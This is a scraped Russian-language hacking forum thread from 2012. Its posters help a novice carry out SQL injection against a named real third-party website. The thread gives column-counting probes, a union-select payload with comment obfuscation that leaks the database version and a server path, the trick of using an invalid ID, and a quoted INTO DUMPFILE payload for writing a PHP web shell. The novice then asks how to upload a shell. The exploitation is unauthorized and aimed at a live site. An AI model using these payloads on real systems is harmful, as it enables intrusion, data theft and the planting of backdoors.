26.08.2012, 20:04
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
а что Вы вывели таким кодом?
|
|
|
26.08.2012, 22:52
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Сообщение от Дирижабль
union+select+1,'',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
Подскажите пожалуйста здесь подробнее.
'
|
|
|
|
28.08.2012, 23:06
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
|
|
|
|
28.08.2012, 23:48
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от Sat-hacker
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
Таким способом колонки не всегда удаётся узнать, линк в студию
|
|
|
|
29.08.2012, 22:52
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
|
|
|
|
29.08.2012, 23:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Sat-hacker
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
неправильно поля подобрал...
Вывод можно получить так
Код:
_ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14--
Failed opening '/var/www/html/inc/templates/ 4.1.12' for inclusion
А вообще тема для таких вопросов тут
|
|
|
|
30.08.2012, 00:33
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от Sat-hacker
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+
False
http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+
True - Not found
Значит - Столбцов 14
дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999
|
|
|
|
30.08.2012, 00:48
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
|
|
|
|
30.08.2012, 08:35
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Просто не очень понял как при помощи этого кода '' залить shell.
Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
|
|
|
|
30.08.2012, 08:43
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Sat-hacker
просто не могу разобраться вот и спросил
просто не пытаешься разобраться вот и спрашиваешь
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
